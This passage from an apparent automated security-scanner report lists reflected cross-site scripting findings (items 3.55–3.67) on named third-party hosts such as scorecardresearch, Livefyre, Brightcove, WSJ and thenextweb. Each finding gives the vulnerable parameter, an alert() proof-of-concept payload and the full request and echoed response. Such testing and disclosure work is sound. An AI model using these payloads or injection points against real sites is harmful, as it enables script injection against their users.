Accept: */*
Referer: http://thenextweb.com/insider/2011/06/25/why-turntable-fm-is-the-most-exciting-social-service-of-the-year/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633; UIDR=1317740365

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Wed, 19 Oct 2011 20:41:33 GMT
Date: Wed, 05 Oct 2011 20:41:33 GMT
Content-Length: 1260
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
r(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"3005693", c3:"1", c4:"http://www.thenextweb.com6f66a<script>alert(1)</script>43bf8311a42", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});



3.55. http://b.scorecardresearch.com/beacon.js [c5 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c5 request parameter is copied into the HTML document as plain text between tags. The payload bd710<script>alert(1)</script>074d9a138e3 was submitted in the c5 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=3005693&c3=1&c4=http%3A%2F%2Fwww.thenextweb.com&c5=bd710<script>alert(1)</script>074d9a138e3&c6=&c10=&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://thenextweb.com/insider/2011/06/25/why-turntable-fm-is-the-most-exciting-social-service-of-the-year/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633; UIDR=1317740365

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Wed, 19 Oct 2011 20:41:35 GMT
Date: Wed, 05 Oct 2011 20:41:35 GMT
Content-Length: 1260
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
ength-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"3005693", c3:"1", c4:"http://www.thenextweb.com", c5:"bd710<script>alert(1)</script>074d9a138e3", c6:"", c10:"", c15:"", c16:"", r:""});



3.56. http://b.scorecardresearch.com/beacon.js [c6 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c6 request parameter is copied into the HTML document as plain text between tags. The payload 6c111<script>alert(1)</script>7afe3df289e was submitted in the c6 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=3005693&c3=1&c4=http%3A%2F%2Fwww.thenextweb.com&c5=&c6=6c111<script>alert(1)</script>7afe3df289e&c10=&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://thenextweb.com/insider/2011/06/25/why-turntable-fm-is-the-most-exciting-social-service-of-the-year/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633; UIDR=1317740365

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Wed, 19 Oct 2011 20:41:37 GMT
Date: Wed, 05 Oct 2011 20:41:37 GMT
Content-Length: 1260
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"3005693", c3:"1", c4:"http://www.thenextweb.com", c5:"", c6:"6c111<script>alert(1)</script>7afe3df289e", c10:"", c15:"", c16:"", r:""});



3.57. http://bootstrap.thenextweb.fyre.co/api/v1.1/public/bootstrap/1872433 [max_followers parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bootstrap.thenextweb.fyre.co
Path:   /api/v1.1/public/bootstrap/1872433

Issue detail

The value of the max_followers request parameter is copied into the HTML document as plain text between tags. The payload afc43<script>alert(1)</script>4d89496ca7d was submitted in the max_followers parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/v1.1/public/bootstrap/1872433?order=-created&max_comments=50&max_followers=10afc43<script>alert(1)</script>4d89496ca7d&conv_meta=%7B%22source_url%22%3A%22http%3A%2F%2Fthenextweb.com%2Finsider%2F2011%2F06%2F25%2Fwhy-turntable-fm-is-the-most-exciting-social-service-of-the-year%2F%22%7D&url=http%253A%2F%2Fthenextweb.com%2Finsider%2F2011%2F06%2F25%2Fwhy-turntable-fm-is-the-most-exciting-social-service-of-the-year%2F&host=thenextweb.com&lftoken= HTTP/1.1
Host: bootstrap.thenextweb.fyre.co
Proxy-Connection: keep-alive
Origin: http://thenextweb.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://thenextweb.com/insider/2011/06/25/why-turntable-fm-is-the-most-exciting-social-service-of-the-year/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 400 BAD REQUEST
Access-Control-Allow-Credentials: true
Access-Control-Allow-Headers: ORIGIN, ROXY_CONNECTION, X_FORWARDED_PROTO, ACCEPT_CHARSET, OST, ACCEPT, CONNECTION, REFERER, USER_AGENT, ACCEPT_LANGUAGE, X_VARNISH, X_FORWARDED_PORT, X_FORWARDED_FOR, ACCEPT_ENCODING
Access-Control-Allow-Methods: POST, GET
Access-Control-Allow-Origin: http://thenextweb.com
Access-Control-Max-Age: 1728000
Content-Type: application/json
Date: Wed, 05 Oct 2011 20:42:10 GMT
Server: Apache/2.2.14 (Ubuntu)
Vary: Cookie
Content-Length: 173
Connection: keep-alive

{"msg": "Unable to convert parameter 'max_followers': invalid literal for int() with base 10: '10afc43<script>alert(1)</script>4d89496ca7d'", "status": "error", "code": 400}

3.58. http://bootstrap.thenextweb.fyre.co/api/v1.1/public/init.js [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bootstrap.thenextweb.fyre.co
Path:   /api/v1.1/public/init.js

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 54636<script>alert(1)</script>ac5c7dfe9fc was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/v1.1/public/init.js?callback=LF.initCallback54636<script>alert(1)</script>ac5c7dfe9fc&url=http%3A//thenextweb.com/insider/2011/06/25/why-turntable-fm-is-the-most-exciting-social-service-of-the-year/&site_id=289775&conv_meta=%7B%22source_url%22%3A%22http%3A//thenextweb.com/insider/2011/06/25/why-turntable-fm-is-the-most-exciting-social-service-of-the-year/%22%7D HTTP/1.1
Host: bootstrap.thenextweb.fyre.co
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://thenextweb.com/insider/2011/06/25/why-turntable-fm-is-the-most-exciting-social-service-of-the-year/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Cache-Control: max-age=3600
Content-Type: application/javascript
Date: Wed, 05 Oct 2011 20:41:41 GMT
Expires: Wed, 05 Oct 2011 21:41:41 GMT
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding,Cookie
Content-Length: 400
Connection: keep-alive

LF.initCallback54636<script>alert(1)</script>ac5c7dfe9fc({"status": "ok", "code": 200, "data": {"assets_version": "76531571", "script_url": "http://zor.fyre.co/wjs/v1.0.76531571/javascripts/livefyre.js", "conv": {"status": "ok", "allow_comments": true, "par
...[SNIP]...

3.59. http://bootstrap.thenextweb.fyre.co/api/v1.1/public/init.js [site_id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bootstrap.thenextweb.fyre.co
Path:   /api/v1.1/public/init.js

Issue detail

The value of the site_id request parameter is copied into the HTML document as plain text between tags. The payload a3092<script>alert(1)</script>9b6aa7e9a44 was submitted in the site_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/v1.1/public/init.js?callback=LF.initCallback&url=http%3A//thenextweb.com/insider/2011/06/25/why-turntable-fm-is-the-most-exciting-social-service-of-the-year/&site_id=289775a3092<script>alert(1)</script>9b6aa7e9a44&conv_meta=%7B%22source_url%22%3A%22http%3A//thenextweb.com/insider/2011/06/25/why-turntable-fm-is-the-most-exciting-social-service-of-the-year/%22%7D HTTP/1.1
Host: bootstrap.thenextweb.fyre.co
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://thenextweb.com/insider/2011/06/25/why-turntable-fm-is-the-most-exciting-social-service-of-the-year/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 400 BAD REQUEST
Cache-Control: max-age=3600
Content-Type: application/javascript
Date: Wed, 05 Oct 2011 20:41:55 GMT
Expires: Wed, 05 Oct 2011 21:41:55 GMT
Server: Apache/2.2.14 (Ubuntu)
Vary: Cookie,Accept-Encoding
Content-Length: 189
Connection: keep-alive

LF.initCallback({"msg": "Unable to convert parameter 'site_id': invalid literal for int() with base 10: '289775a3092<script>alert(1)</script>9b6aa7e9a44'", "status": "error", "code": 400});

3.60. http://bootstrap.thenextweb.fyre.co/api/v1.1/public/init.js [url parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bootstrap.thenextweb.fyre.co
Path:   /api/v1.1/public/init.js

Issue detail

The value of the url request parameter is copied into the HTML document as plain text between tags. The payload f2672<script>alert(1)</script>5e44580f52b was submitted in the url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/v1.1/public/init.js?callback=LF.initCallback&url=f2672<script>alert(1)</script>5e44580f52b&site_id=289775&conv_meta=%7B%22source_url%22%3A%22http%3A//thenextweb.com/insider/2011/06/25/why-turntable-fm-is-the-most-exciting-social-service-of-the-year/%22%7D HTTP/1.1
Host: bootstrap.thenextweb.fyre.co
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://thenextweb.com/insider/2011/06/25/why-turntable-fm-is-the-most-exciting-social-service-of-the-year/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 400 BAD REQUEST
Cache-Control: max-age=3600
Content-Type: application/javascript
Date: Wed, 05 Oct 2011 20:41:48 GMT
Expires: Wed, 05 Oct 2011 21:41:48 GMT
Server: Apache/2.2.14 (Ubuntu)
Vary: Cookie,Accept-Encoding
Content-Length: 170
Connection: keep-alive

LF.initCallback({"msg": "Unable to convert parameter 'url': Invalid url: f2672<script>alert(1)</script>5e44580f52b, missing URL scheme", "status": "error", "code": 400});

3.61. http://c.brightcove.com/services/messagebroker/amf [3rd AMF string parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://c.brightcove.com
Path:   /services/messagebroker/amf

Issue detail

The value of the 3rd AMF string parameter is copied into the HTML document as plain text between tags. The payload 37c51<script>alert(1)</script>d62efdff90b was submitted in the 3rd AMF string parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /services/messagebroker/amf?playerKey=AQ~~,AAAAipOTmrk~,ppF_qxBkWm4G-M_tDdbW6qnuU4iUxLyo HTTP/1.1
Host: c.brightcove.com
Proxy-Connection: keep-alive
Content-Length: 593
Origin: http://c.brightcove.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
content-type: application/x-amf
Accept: */*
Referer: http://c.brightcove.com/services/viewer/federated_f9?isVid=1&isUI=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

.......Fcom.brightcove.experience.ExperienceRuntimeFacade.getDataForExperience../1.....    ...Q24034edff8e3e8a393a3c0d1c6b7a66f67b19ee1
cccom.brightcove.experience.ViewerExperienceRequest.deliveryType.ex
...[SNIP]...

Response

HTTP/1.1 200 OK
X-BC-Client-IP: 50.23.123.106
X-BC-Connecting-IP: 50.23.123.106
Content-Type: application/x-amf
Vary: Accept-Encoding
Date: Wed, 05 Oct 2011 20:44:22 GMT
Server:
Content-Length: 4359

......../1/onResult.......
.C[com.brightcove.templating.ViewerExperienceDTO#analyticsTrackers.publisherType.publisherId.playerKey.version#programmedContent!adTranslationSWF.id.hasProgramming+programmi
...[SNIP]...
aRrsW ..eAQ~~,AAAAipOTmrk~,ppF_qxBkWm4G-M_tDdbW6qnuU4iUxLyo.    ..videoPlayer
sicom.brightcove.player.programming.ProgrammedMediaDTO.mediaId..playerId.componentRefId    type.mediaDTO
.Bq    m&......ivideoPlayer37c51<script>alert(1)</script>d62efdff90b.........
.cOcom.brightcove.catalog.trimmed.VideoDTO.dateFiltered+FLVFullLengthStreamed/SWFVerificationRequired.endDate.FLVFullCodec.linkText.geoRestricted.previewLength.FLVPreviewSize.longDescription.
...[SNIP]...

3.62. http://cc.wsj.net/cdssvco/file/v2/Files [absolutePath parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cc.wsj.net
Path:   /cdssvco/file/v2/Files

Issue detail

The value of the absolutePath request parameter is copied into the HTML document as plain text between tags. The payload 19ab8<img%20src%3da%20onerror%3dalert(1)>f0332744d10 was submitted in the absolutePath parameter. This input was echoed as 19ab8<img src=a onerror=alert(1)>f0332744d10 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /cdssvco/file/v2/Files?absolutePath=%2Fdjscript%2Fbucket%2FNA_WSJ_PUB%2Fpage%2F0_0_WG_HeaderOne%2Fprovided%2Fj_global_slim%2Fversion%2Fvblg40.js19ab8<img%20src%3da%20onerror%3dalert(1)>f0332744d10&absolutePath=%2Fpublic%2Fpage%2FNA_WSJ_PUB%3A0_0_WG_HeaderOne-none-vblg40.html&c=dj.module._fileServiceDao.fragment_NA_WSJ_PUB_0_0_WG_HeaderOne HTTP/1.1
Host: cc.wsj.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://blogs.wsj.com/venturecapital/?mod=tech
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Restlet-Framework/2.0.3
Accept-Ranges: bytes
Vary: Accept-Charset,Accept-Encoding,Accept-Language,Accept
Content-Type: application/x-javascript
P3P: CP=CAO DSP COR CURa ADMa DEVi TAIo PSAa PSDa IVDi CONi OTPi OUR OTRi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA OTC
X-DEBUG-EMGSESSIONID: NULL
Date: Wed, 05 Oct 2011 21:11:56 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 255121

dj.module._fileServiceDao.fragment_NA_WSJ_PUB_0_0_WG_HeaderOne({"files":[{"absolutePath":"/djscript/bucket/NA_WSJ_PUB/page/0_0_WG_HeaderOne/provided/j_global_slim/version/vblg40.js19ab8<img src=a onerror=alert(1)>f0332744d10","data":"if (typeof dojo !== \"undefined\") {\n dojo.provide(\"blueKai.blueKai\");\n}\n\n/* global blueKai document unescape */\nif (typeof blueKai === \"undefined\") {\n\tblueKai = {};\n}\nvar KRUXS
...[SNIP]...

3.63. http://cc.wsj.net/cdssvco/file/v2/Files [c parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cc.wsj.net
Path:   /cdssvco/file/v2/Files

Issue detail

The value of the c request parameter is copied into the HTML document as plain text between tags. The payload ce8ce<img%20src%3da%20onerror%3dalert(1)>000d54995fb was submitted in the c parameter. This input was echoed as ce8ce<img src=a onerror=alert(1)>000d54995fb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /cdssvco/file/v2/Files?absolutePath=%2Fdjscript%2Fbucket%2FNA_WSJ_PUB%2Fpage%2F0_0_WG_HeaderOne%2Fprovided%2Fj_global_slim%2Fversion%2Fvblg40.js&absolutePath=%2Fpublic%2Fpage%2FNA_WSJ_PUB%3A0_0_WG_HeaderOne-none-vblg40.html&c=dj.module._fileServiceDao.fragment_NA_WSJ_PUB_0_0_WG_HeaderOnece8ce<img%20src%3da%20onerror%3dalert(1)>000d54995fb HTTP/1.1
Host: cc.wsj.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://blogs.wsj.com/venturecapital/?mod=tech
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Restlet-Framework/2.0.3
Accept-Ranges: bytes
Vary: Accept-Charset,Accept-Encoding,Accept-Language,Accept
Content-Type: application/x-javascript
P3P: CP=CAO DSP COR CURa ADMa DEVi TAIo PSAa PSDa IVDi CONi OTPi OUR OTRi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA OTC
X-DEBUG-EMGSESSIONID: NULL
Date: Wed, 05 Oct 2011 21:12:09 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 255121

dj.module._fileServiceDao.fragment_NA_WSJ_PUB_0_0_WG_HeaderOnece8ce<img src=a onerror=alert(1)>000d54995fb({"files":[{"absolutePath":"/djscript/bucket/NA_WSJ_PUB/page/0_0_WG_HeaderOne/provided/j_global_slim/version/vblg40.js","data":"if (typeof dojo !== \"undefined\") {\n dojo.provide(\"blueKai.blueKai\")
...[SNIP]...

3.64. http://cdn.krxd.net/config/ [site parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.krxd.net
Path:   /config/

Issue detail

The value of the site request parameter is copied into the HTML document as plain text between tags. The payload fc5e3<script>alert(1)</script>85758782c82 was submitted in the site parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /config/?pubid=d719e39d-e4be-4896-8d71-71012d0c51a0&site=nbcnewyork.comfc5e3<script>alert(1)</script>85758782c82&callback=KRUX.configOnload HTTP/1.1
Host: cdn.krxd.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.nbcnewyork.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _kuid_=10.32.46.226.1315320921124944; ServedBy=logger-b012

Response

HTTP/1.1 404 Not Found
Content-Type: text/javascript
P3P: policyref="http://cdn.krxd.net/kruxcontent/p3p.xml", CP="NON DSP COR NID OUR DEL SAM OTR UNR COM NAV INT DEM CNT STA PRE LOC OTC"
Server: TornadoServer/1.2
X-Config-Cache: Miss
X-Request-Time: D=8156 t=1317838794651252
X-Served-By: logger-b005.krxd.net
Content-Length: 97
Date: Wed, 05 Oct 2011 18:19:54 GMT
Connection: close

{"error": "Non existant site for NBCU - nbcnewyork.comfc5e3<script>alert(1)</script>85758782c82"}

3.65. http://cdn.thenextweb.com/wp-content/themes/tnw_6/static/fonts/proximanova-regular-webfont.woff [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.thenextweb.com
Path:   /wp-content/themes/tnw_6/static/fonts/proximanova-regular-webfont.woff

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2f823</script><script>alert(1)</script>c8ab89aca16 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /wp-content2f823</script><script>alert(1)</script>c8ab89aca16/themes/tnw_6/static/fonts/proximanova-regular-webfont.woff HTTP/1.1
Host: cdn.thenextweb.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://thenextweb.com/insider/2011/06/25/why-turntable-fm-is-the-most-exciting-social-service-of-the-year/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ocmx_mobile=normal

Response

HTTP/1.1 404 Not Found
x-backend: 172.20.0.144
Set-Cookie: ocmx_mobile=deleted; expires=Tue, 05-Oct-2010 20:42:15 GMT; path=/; domain=.thenextweb.com
Set-Cookie: ocmx_mobile=normal; path=/; domain=.thenextweb.com
Set-Cookie: PHPSESSID=no7uktdtj2g425naatuucumc56; path=/
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://thenextweb.com/xmlrpc.php
Last-Modified: Wed, 05 Oct 2011 20:42:16 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
X-Cacheable: YES
Content-Length: 26123
Date: Wed, 05 Oct 2011 20:55:41 GMT
Age: 1
X-Cache: MISS
Proxy-Connection: keep-alive
Via: http/1.1 edge07.lax.netdna.com (ApacheTrafficServer/2.1.4-unstable [cMsSf ])
Server: ATS/2.1.4-unstable

<!DOCTYPE html>
<html dir="ltr" lang="en-US" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta charset="UTF-8" />
<title>Not Found</tit
...[SNIP]...
type="text/javascript">
    var $_CONFIG = {
    'site_url': 'http://thenextweb.com',
    'theme_url': 'http://thenextweb.com/wp-content/themes/tnw_6',
    'current_url': '/wp-content2f823</script><script>alert(1)</script>c8ab89aca16/themes/tnw_6/static/fonts/proximanova-regular-webfont.woff'
    };
</script>
...[SNIP]...

3.66. http://cdn.thenextweb.com/wp-content/themes/tnw_6/static/fonts/proximanova-regular-webfont.woff [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.thenextweb.com
Path:   /wp-content/themes/tnw_6/static/fonts/proximanova-regular-webfont.woff

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b9191</script><script>alert(1)</script>ac3d12fa4c7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /wp-content/themesb9191</script><script>alert(1)</script>ac3d12fa4c7/tnw_6/static/fonts/proximanova-regular-webfont.woff HTTP/1.1
Host: cdn.thenextweb.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://thenextweb.com/insider/2011/06/25/why-turntable-fm-is-the-most-exciting-social-service-of-the-year/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ocmx_mobile=normal

Response

HTTP/1.1 404 Not Found
x-backend: 172.20.0.144
Set-Cookie: ocmx_mobile=deleted; expires=Tue, 05-Oct-2010 20:42:36 GMT; path=/; domain=.thenextweb.com
Set-Cookie: ocmx_mobile=normal; path=/; domain=.thenextweb.com
Set-Cookie: PHPSESSID=fs3arhagkauo11vuarn53uu023; path=/
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://thenextweb.com/xmlrpc.php
Last-Modified: Wed, 05 Oct 2011 20:42:37 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
X-Cacheable: YES
Content-Length: 26123
Date: Wed, 05 Oct 2011 20:56:02 GMT
Age: 0
X-Cache: MISS
Proxy-Connection: keep-alive
Via: http/1.1 edge07.lax.netdna.com (ApacheTrafficServer/2.1.4-unstable [cMsSf ])
Server: ATS/2.1.4-unstable

<!DOCTYPE html>
<html dir="ltr" lang="en-US" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta charset="UTF-8" />
<title>Not Found</tit
...[SNIP]...
text/javascript">
    var $_CONFIG = {
    'site_url': 'http://thenextweb.com',
    'theme_url': 'http://thenextweb.com/wp-content/themes/tnw_6',
    'current_url': '/wp-content/themesb9191</script><script>alert(1)</script>ac3d12fa4c7/tnw_6/static/fonts/proximanova-regular-webfont.woff'
    };
</script>
...[SNIP]...

3.67. http://cdn.thenextweb.com/wp-content/themes/tnw_6/static/fonts/proximanova-regular-webfont.woff [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.thenextweb.com
Path:   /wp-content/themes/tnw_6/static/fonts/proximanova-regular-webfont.woff

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b58d0</script><script>alert(1)</script>6d865618bfe was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /wp-content/themes/tnw_6b58d0</script><script>alert(1)</script>6d865618bfe/static/fonts/proximanova-regular-webfont.woff HTTP/1.1
Host: cdn.thenextweb.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://thenextweb.com/insider/2011/06/25/why-turntable-fm-is-the-most-exciting-social-service-of-the-year/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ocmx_mobile=normal

Response

HTTP/1.1 404 Not Found
x-backend: 172.20.0.144
Set-Cookie: ocmx_mobile=deleted; expires=Tue, 05-Oct-2010 20:42:59 GMT; path=/; domain=.thenextweb.com
Set-Cookie: ocmx_mobile=normal; path=/; domain=.thenextweb.com
Set-Cookie: PHPSESSID=nl4ih5eksgu2a01lc1j3t8b9i5; path=/
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://thenextweb.com/xmlrpc.php
Last-Modified: Wed, 05 Oct 2011 20:43:00 GMT
